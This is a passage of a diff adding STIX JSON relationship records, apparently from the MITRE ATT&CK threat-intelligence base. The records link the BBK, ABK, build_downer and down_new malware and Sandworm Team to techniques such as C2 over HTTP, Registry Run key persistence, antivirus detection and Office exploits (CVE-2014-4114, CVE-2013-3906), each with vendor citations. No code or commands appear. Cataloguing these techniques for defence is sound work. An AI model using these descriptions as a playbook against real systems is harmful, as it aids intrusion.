+ "created": "2020-06-10T18:15:11.862Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7562ef46-c452-4338-9e06-3afdcf2c0e04",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.394Z",
+ "created": "2020-06-10T18:15:11.864Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--57bf4742-638a-41fe-8c09-e0f690b74190",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.378Z",
+ "created": "2020-06-10T18:20:44.112Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7b46066e-4e23-4391-833a-651ea1e0982d",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.388Z",
+ "created": "2020-06-10T18:20:44.115Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--51151669-a076-4d4a-af68-cf303baf01d5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.418Z",
+ "created": "2020-06-10T18:22:16.978Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to use the CreatePipe API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f8f24599-854a-4795-891b-c28d89b8ddcc",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.430Z",
+ "created": "2020-06-10T18:29:32.028Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
+ "external_references": [
+ {
+ "source_name": "ESET TeleBots Oct 2018",
+ "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018."
+ }
+ ],
+ "description": "(Citation: ESET TeleBots Oct 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--40ecbb46-642a-4742-be84-8ec34382e7c0",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.630Z",
+ "created": "2020-06-10T18:36:54.630Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--11194d8b-fdce-45d2-8047-df15bb8f16bd",
+ "external_references": [
+ {
+ "source_name": "ESET TeleBots Oct 2018",
+ "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018."
+ }
+ ],
+ "description": "(Citation: ESET TeleBots Oct 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3bf307c2-efb0-40b1-b896-82d15a9bce5f",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.633Z",
+ "created": "2020-06-10T18:36:54.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--3249e92a-870b-426d-8790-ba311c1abfb4",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike GTR 2019",
+ "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf",
+ "description": "CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "Secureworks IRON VIKING ",
+ "url": "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike GTR 2019)(Citation: Secureworks IRON VIKING )",
+ "relationship_type": "uses",
+ "id": "relationship--f7bfecc9-a5ff-43c4-ad9e-4ca8c64c7fe2",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.635Z",
+ "created": "2020-06-10T18:36:54.635Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
+ "external_references": [
+ {
+ "source_name": "NCSC Sandworm Feb 2020",
+ "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory",
+ "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "(Citation: NCSC Sandworm Feb 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c5dd0d66-99f1-4efd-b0f9-bf9f9118ff16",
+ "type": "relationship",
+ "modified": "2020-06-10T18:36:54.638Z",
+ "created": "2020-06-10T18:36:54.638Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--506ed241-ba1e-47da-901a-d1943510d4b5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.415Z",
+ "created": "2020-06-10T19:31:48.042Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to add itself to the Registry Run key for persistence.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5266fdd9-f62e-4412-b5d0-d26ba6d5a1ab",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.434Z",
+ "created": "2020-06-10T19:31:48.047Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--56465210-d279-4982-a9fa-94a69f5b0b80",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.402Z",
+ "created": "2020-06-10T19:31:48.069Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to use the WinExec API to execute malware on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--419b786c-a7db-4357-918c-aa1b883203ee",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.410Z",
+ "created": "2020-06-10T19:31:48.076Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--79c46f52-743a-4a17-bede-aa003c03f6b1",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.405Z",
+ "created": "2020-06-10T19:31:48.084Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d870ed48-a7df-4aee-af06-c58ee59432e7",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.399Z",
+ "created": "2020-06-10T19:31:48.115Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to send system volume information to C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a6c20b07-57ea-46dd-aa71-93849b6b66ca",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.412Z",
+ "created": "2020-06-10T19:31:48.126Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "iSight Sandworm Oct 2014",
+ "url": "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/",
+ "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Base64 encoding within malware variants. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.(Citation: iSight Sandworm Oct 2014)(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--c2e9f949-59a5-4e96-b0dd-0bde1a507909",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.281Z",
+ "created": "2020-06-10T19:35:58.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "iSight Sandworm Oct 2014",
+ "url": "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/",
+ "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has delivered malicious Microsoft Office attachments via spearphishing emails.(Citation: iSight Sandworm Oct 2014)(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--5259c2ae-964d-49b6-a7e7-6246e748369f",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.279Z",
+ "created": "2020-06-10T19:35:58.143Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "iSight Sandworm Oct 2014",
+ "url": "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/",
+ "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "TrendMicro Sandworm October 2014",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/",
+ "description": "Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability \u2018CVE-2014-4114\u2019 aka \u201cSandworm\u201d. Retrieved June 18, 2020."
+ },
+ {
+ "source_name": "McAfee Sandworm November 2013",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2",
+ "description": "Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).(Citation: iSight Sandworm Oct 2014)(Citation: TrendMicro Sandworm October 2014)(Citation: McAfee Sandworm November 2013)",
+ "relationship_type": "uses",
+ "id": "relationship--2311db5c-218f-44f8-aa50-3e8322b79081",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:20.611Z",
+ "created": "2020-06-10T19:35:58.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--785d0d93-1500-40b5-9f71-9d51aadef914",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.652Z",
+ "created": "2020-06-10T20:19:59.897Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--215c28bd-3698-4962-b8a9-c632f27c9c82",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.656Z",
+ "created": "2020-06-10T20:19:59.901Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f874b527-e973-40f2-89cb-2c7feab5b6b4",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.650Z",
+ "created": "2020-06-10T20:19:59.929Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the system volume information of a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--14de629c-9b49-4841-901a-85fab61f693b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.663Z",
+ "created": "2020-06-10T20:19:59.934Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the MAC address of a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--dd002813-b9b0-435f-8fb1-ee015c401280",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.386Z",
+ "created": "2020-06-10T20:19:59.942Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
